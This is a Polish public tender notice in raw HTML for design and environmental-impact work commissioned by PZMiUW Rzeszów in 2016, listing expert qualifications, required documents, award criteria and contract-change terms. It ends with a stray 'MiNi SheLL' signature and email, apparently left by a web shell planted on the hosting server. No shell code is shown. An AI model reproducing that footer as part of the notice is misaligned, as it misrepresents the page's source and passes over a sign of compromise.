Wykonawca będzie dysponować zespołem pozwalającym przeprowadzić ocenę oddziaływania przedsięwzięcia na wszystkie komponenty środowiska.
W szczególności w skład tego zespołu będzie wchodzić:
1)  co najmniej 1 ekspert ds. oddziaływania na stan wód
W/w ekspert powinien:
-  wykazać udział w wykonaniu co najmniej 1 raportu o oddziaływaniu przedsięwzięcia na środowisko w części obejmującej ocenę oddziaływania na cele środowiskowe w rozumieniu ustawy z dnia 18.07.2001 r. Prawo wodne (tj. Dz. U. z 2015 r., poz. 469, z późn. zm.), w oparciu o który uzyskano decyzję o środowiskowych uwarunkowaniach, 
- ukończyć, w rozumieniu przepisów o szkolnictwie wyższym, co najmniej studia magisterskie albo studia inżynierskie na kierunkach: biologia, inżynieria środowiska lub ochrona środowiska;
Doświadczenie należy wykazać poprzez podanie:
 - nazwy zamówienia, tj. nazwy przedsięwzięcia dla którego sporządzony został raport o 
    oddziaływaniu na środowisko,
- zakresu opracowania ww. zamówienia (tj. raportu o oddziaływaniu przedsięwzięcia na 
Środowisko) wraz ze wskazaniem, czy ww. ekspert brał udział w jego wykonaniu w części obejmującej ocenę oddziaływania na cele środowiskowe w rozumieniu ustawy z dnia 18.07.2001 r. Prawo wodne,
- inwestorów, dla których zostało wykonane ww. zamówienie,
- informacji dot. wydania na podstawie ww. raportu decyzji o środowiskowych uwarunkowaniach (data, znak i organ wydający decyzję).
2)  co najmniej 1 ekspert ds. oceny oddziaływania na środowisko przyrodnicze w zakresie flory
oraz
co najmniej 1 ekspert ds. oceny oddziaływania na środowisko przyrodnicze w zakresie fauny
Każdy z ww. ekspertów powinien:
- potwierdzić uczestnictwo w wykonaniu co najmniej 2 raportów o oddziaływaniu przedsięwzięcia na środowisko, w części obejmującej wykonanie inwentaryzacji przyrodniczej oraz przeprowadzenie oceny oddziaływania na środowisko przyrodnicze, w oparciu o które uzyskano decyzje o środowiskowych uwarunkowaniach, 
- ukończyć, w rozumieniu przepisów o szkolnictwie wyższym, co najmniej studia magisterskie albo studia inżynierskie na kierunkach: biologia lub leśnictwo.
Doświadczenie należy wykazać poprzez podanie:
- nazw zamówień, tj. nazw przedsięwzięć dla których sporządzone zostały raporty o oddziaływaniu na środowisko,
- inwestorów, dla których zostały wykonane ww. zamówienia,
- zakresu opracowań ww. zamówień (tj. raportów o oddziaływaniu przedsięwzięć na środowisko) wraz ze wskazaniem czy ww. eksperci brali udział w wykonaniu tych zamówień
w części obejmującej wykonanie inwentaryzacji przyrodniczej oraz przeprowadzenie oceny oddziaływania na środowisko przyrodnicze,
-  informacji dot. wydania na podstawie ww. raportów decyzji o środowiskowych uwarunkowaniach (data, znak i organ wydający decyzje).
Kwalifikacja na podstawie zał. nr 7 i 8 do oferty.
 2) W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i  zawodowy. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">- Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Prawo zamówień publicznych (zał. nr 4 do oferty)
- zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (zał. nr 9 do oferty)
- zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (zał. nr 10 do oferty)
- oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej (zał. nr 14 do oferty) w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 1 pkt 23 ustawy Prawo zamówień publicznych
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- Wykaz wykonanych usług określonych w pkt. III.1.3)1)A ogłoszenia z okresu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wg podanego wzoru Doświadczenie Wykonawcy (zał. nr 5 do oferty)
- Dowody określające, czy usługi, o których mowa w Załączniku nr 5 Doświadczenie Wykonawcy zostały wykonane należycie (zał. nr 6 do oferty)
- Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych, doświadczenia i wykształcenia wg podanego wzoru  Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wskazanych zgodnie z pkt. III.1.3)1)B ogłoszenia (zał. nr 7 do oferty)
- Oświadczenie Wykonawcy, że osoby wskazane w załączniku nr 7 posiadają wymagane uprawnienia, jeśli ustawa nakłada obowiązek posiadania takich uprawnień, zgodnie z podanym wzorem Oświadczenie o kwalifikacjach technicznych (zał. nr 8 do oferty)
UWAGA: Do oferty należy dołączyć osobne oświadczenie dla osób, o których mowa III.1.3)1)B lit. a-d ogłoszenia, wskazanych w zał. nr 7 do uczestniczenia w wykonaniu zamówienia.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz oferty (zał. nr 1 do s.i.w.z.), Zakres rzeczowo-finansowy (zał. nr 1 do oferty), *Wykaz dokumentów zastrzeżonych, jako tajne (zał. nr 11 do oferty), *Pisemne zobowiązanie podmiotu trzeciego lub inny dokument potwierdzający oddanie do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia  w przypadku korzystania przez Wykonawcę z zasobów innych podmiotów (zał. nr 12 do oferty), *Pełnomocnictwo stosownie do postanowień zawartych w art. 23 ust. 2 ustawy Prawo Zamówień Publicznych (zał. nr 13 do oferty) * jeżeli dotyczy</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie zespołu projektowego	</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />nie dotyczy<br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />nie dotyczy<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />nie dotyczy<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Na etapie projektu budowlanego strony dokonają rozliczenia za zakres prac Projekt podziału nieruchomości (poz. II.8 i VI.8 załącznika nr 1 do umowy  Zakres rzeczowo-finansowy) w oparciu o:
- faktyczną ilość działek do podziału,
- ryczałtową cenę jednostkową podziału 1 działki 
Zmiana wynagrodzenia zostanie wprowadzona aneksem do umowy.
2.	Na etapie wykonywania operatu szacunkowego wyceny nieruchomości gruntowych strony dokonają rozliczenia za zakres prac, o którym mowa w poz. IV i VIII zał. nr 1 do umowy  Zakres rzeczowo-finansowy w oparciu o:
- faktyczną ilość działek,
- ryczałtową cenę jednostkową wyceny nieruchomości gruntowych dla 1 działki,
- ryczałtową cenę jednostkową wyceny składników roślinnych dla 1 działki,
- ryczałtową cenę jednostkową wyceny składników budowlanych dla 1 działki,
Zmiana wynagrodzenia zostanie wprowadzona aneksem do umowy.
3.	Podatek od towarów i usług VAT będzie naliczony w fakturach zgodnie z obowiązującymi przepisami. 
Wynagrodzenie Jednostki Projektowej, o którym mowa w ust. 2, będzie waloryzowane w trakcie obowiązywania umowy, w przypadku zmiany stawki podatku od towarów i usług (VAT).
4.	Wynagrodzenie Jednostki Projektowej, o którym mowa w ust. 2, będzie waloryzowane w trakcie obowiązywania umowy, na zasadach określonych poniżej, w przypadku zmiany:
1)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
2)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Jednostkę Projektową.
Warunkiem dokonania waloryzacji będzie skierowanie do Zamawiającego pisemnego wniosku Jednostki Projektowej zawierającego uzasadnienie i szczegółowy sposób wyliczenia nowych cen oraz wpływ zmiany na wynagrodzenie Jednostki Projektowej. 
5. Zamawiający, niezależnie od pozostałych przypadków przewidzianych w niniejszej umowie, dopuszcza możliwość zmian postanowień w niej zawartych w następujących okolicznościach:
1)	zmiany przepisów prawnych dotyczących przedmiotu umowy, jeżeli zmiana przepisów wymaga zmiany postanowień umowy,
2)	sytuacji niezależnych od stron umowy,
3)	ograniczenia zakresu przedmiotu umowy,
4)	w przypadku konieczności udzielenia zamówienia niezbędnego do wykonania przedmiotu umowy lub w szczególny sposób z nim powiązanego, 
5)	w przypadku konieczności zmiany terminu realizacji przedmiotu umowy lub terminów realizacji poszczególnych zakresów przedmiotu umowy, określonych w § 2 wraz z konsekwencjami z tego wynikającymi w sytuacji, gdy:
a)	wystąpią przerwy w wykonaniu umowy z przyczyn leżących po stronie Zamawiającego,
b)	wystąpią opóźnienia w wykonaniu przedmiotu umowy z przyczyn niezależnych od Jednostki Projektowej, w szczególności wynikające z:
	przedłużających się procedur administracyjnych, mających wpływ na termin wykonania, ewentualnych odwołań od wydanych decyzji administracyjnych oraz przedłużających się uzgodnień projektów branżowych i projektów kolizji, mających wpływ na termin wykonania,
	konieczności prostowania błędów i istniejących rozbieżności w ewidencji gruntów,
c)	Jednostka Projektowa zakończy realizację przedmiotu umowy przed terminem lub realizację poszczególnych zakresów przedmiotu umowy przed upływem terminów, określonych w § 2 umowy.      
6)	jeżeli w związku z przyznaniem środków finansowych na realizację przedmiotu umowy albo na skutek zmian warunków ich przyznania, konieczna jest zmiana zapisów umowy dotyczących w szczególności zasad rozliczeń  i warunków płatności za wykonanie przedmiotu umowy,
7)	jeżeli wprowadzenie zmian do umowy pociąga za sobą konieczność zmiany zapisów umowy dotyczących fakturowania lub procedury odbioru przedmiotu umowy,
8)	w razie konieczności aktualizacji mapy do celów projektowych,
9)	w razie konieczności zmiany nazwy zadania w trakcie realizacji przedmiotu umowy.
2.	Zmiana ustalonego w umowie wynagrodzenia nastąpi wyłącznie, gdy zaistnieją zdarzenia objęte regulacją § 3 ust. 3, 4, 5, 6 (rozliczenie za Projekt podziału nieruchomości, rozliczenie za wykonanie operatu szacunkowego wyceny nieruchomości gruntowych; zmiana podatku od towarów i usług VAT; waloryzacja wynagrodzenia) oraz § 4 umowy (ograniczenie zakresu) 
3.	W przypadku wystąpienia okoliczności, o których mowa w ust. 1 i 2 Jednostka Projektowa zwróci się do Zamawiającego z wnioskiem o dokonanie zmiany umowy, zawierającym stosowne uzasadnienie. Wniosek powinien być złożony w formie pisemnej przed wprowadzeniem zmiany, niezwłocznie po wystąpieniu okoliczności, uzasadniających jej dokonanie. Zamawiający po zapoznaniu się z uzasadnieniem i przy uwzględnieniu okoliczności sprawy dokona oceny zasadności zmiany umowy. W przypadku okoliczności leżących po stronie Zamawiającego, Jednostka Projektowa zostanie poinformowana niezwłocznie o ich zaistnieniu i o konieczności zmiany umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br />nie dotyczy<br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br />nie dotyczy<br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/10/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Miejsce i termin otwarcia ofert: PZMiUW Rzeszów, ul. Hetmańska 9 - sala konferencyjna (II p.), w dniu 07.10.2016 r. godz. 10:00
2. Osoby uprawnione do porozumiewania się z Wykonawcami:
1)	Ewa Migut   tel. (17) 85 37 418 - sprawy merytoryczne
2)	Andrzej Sumara  tel. (17) 85 37 450  sprawy merytoryczne (operat szacunkowy i geodezyjny) 
3)	Łukasz Gacek  tel. (17) 85 37 445 - sprawy formalnoprawne. 
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com